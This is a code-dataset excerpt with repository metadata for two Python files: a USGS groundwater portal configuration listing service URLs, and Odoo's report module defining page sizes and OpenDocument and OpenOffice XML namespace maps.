7d65053a330dc94ec0dbbea251ab55ac7d6ed376
|
[
"CC0-1.0"
] | null | null | null |
"""
Application configuration settings
"""
DEBUG = False
SERVICE_ROOT = 'https://cida.usgs.gov'
STATS_SERVICE_ROOT = 'http://cida.usgs.gov/ngwmn_statistics'
CONFLUENCE_URL = 'https://my.usgs.gov/confluence/'
STATISTICS_METHODS_URL = CONFLUENCE_URL + 'createrssfeed.action?types=page&spaces=GWDataPortal&title' \
'=NGWMN+Statistics+Methods&labelString=ngwmn-stat-meth&excludedSpaceKeys%3D&sort=modified' \
'&maxResults=10&timeSpan=5000&showContent=true&confirm=Create+RSS+Feed '
# URL pattern for retrieving SIFTA cooperator logos
COOPERATOR_SERVICE_PATTERN = 'https://water.usgs.gov/customer/stories/{site_no}&StartDate=10/1/{year}&EndDate={current_date}'
| 39.5
| 125
| 0.735584
|
dffcffa859cf4d567ee47e96c68407f75a150ff8
| 2,382
|
py
|
Python
|
apps/odoo/lib/odoo-10.0.post20170615-py2.7.egg/odoo/report/common.py
|
gtfarng/Odoo_migrade
|
9cc28fae4c379e407645248a29d22139925eafe7
|
[
"Apache-2.0"
] | 1
|
2019-12-19T01:53:13.000Z
|
2019-12-19T01:53:13.000Z
|
apps/odoo/lib/odoo-10.0.post20170615-py2.7.egg/odoo/report/common.py
|
gtfarng/Odoo_migrade
|
9cc28fae4c379e407645248a29d22139925eafe7
|
[
"Apache-2.0"
] | null | null | null |
apps/odoo/lib/odoo-10.0.post20170615-py2.7.egg/odoo/report/common.py
|
gtfarng/Odoo_migrade
|
9cc28fae4c379e407645248a29d22139925eafe7
|
[
"Apache-2.0"
] | null | null | null |
# -*- coding: utf-8 -*-
# Part of Odoo. See LICENSE file for full copyright and licensing details.
pageSize = {
'A4': (210,297),
'A5': (148.5,105)
}
odt_namespace = {
"office":"{urn:oasis:names:tc:opendocument:xmlns:office:1.0}",
"style":"{urn:oasis:names:tc:opendocument:xmlns:style:1.0}",
"text":"{urn:oasis:names:tc:opendocument:xmlns:text:1.0}",
"table":"{urn:oasis:names:tc:opendocument:xmlns:table:1.0}",
"draw":"{urn:oasis:names:tc:opendocument:xmlns:drawing:1.0}",
"fo":"{urn:oasis:names:tc:opendocument:xmlns:xsl-fo-compatible:1.0}",
"xlink":"{http://www.w3.org/1999/xlink}",
"dc":"{http://purl.org/dc/elements/1.1/}",
"meta":"{urn:oasis:names:tc:opendocument:xmlns:meta:1.0}",
"number":"{urn:oasis:names:tc:opendocument:xmlns:datastyle:1.0}",
"svg":"{urn:oasis:names:tc:opendocument:xmlns:svg-compatible:1.0}",
"chart":"{urn:oasis:names:tc:opendocument:xmlns:chart:1.0}",
"dr3d":"{urn:oasis:names:tc:opendocument:xmlns:dr3d:1.0}",
"math":"{http://www.w3.org/1998/Math/MathML}",
"form":"{urn:oasis:names:tc:opendocument:xmlns:form:1.0}",
"script":"{urn:oasis:names:tc:opendocument:xmlns:script:1.0}",
"ooo":"{http://openoffice.org/2004/office}",
"ooow":"{http://openoffice.org/2004/writer}",
"oooc":"{http://openoffice.org/2004/calc}",
"dom":"{http://www.w3.org/2001/xml-events}" }
sxw_namespace = {
"office":"{http://openoffice.org/2000/office}",
"style":"{http://openoffice.org/2000/style}",
"text":"{http://openoffice.org/2000/text}",
"table":"{http://openoffice.org/2000/table}",
"draw":"{http://openoffice.org/2000/drawing}",
"fo":"{http://www.w3.org/1999/XSL/Format}",
"xlink":"{http://www.w3.org/1999/xlink}",
"dc":"{http://purl.org/dc/elements/1.1/}",
"meta":"{http://openoffice.org/2000/meta}",
"number":"{http://openoffice.org/2000/datastyle}",
"svg":"{http://www.w3.org/2000/svg}",
"chart":"{http://openoffice.org/2000/chart}",
"dr3d":"{http://openoffice.org/2000/dr3d}",
"math":"{http://www.w3.org/1998/Math/MathML}",
"form":"{http://openoffice.org/2000/form}",
"script":"{http://openoffice.org/2000/script}",
"ooo":"{http://openoffice.org/2004/office}",
"ooow":"{http://openoffice.org/2004/writer}",
"oooc":"{http://openoffice.org/2004/calc}",
"dom":"{http://www.w3.org/2001/xml-events}"}
| 45.807692
| 74
| 0.628463
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.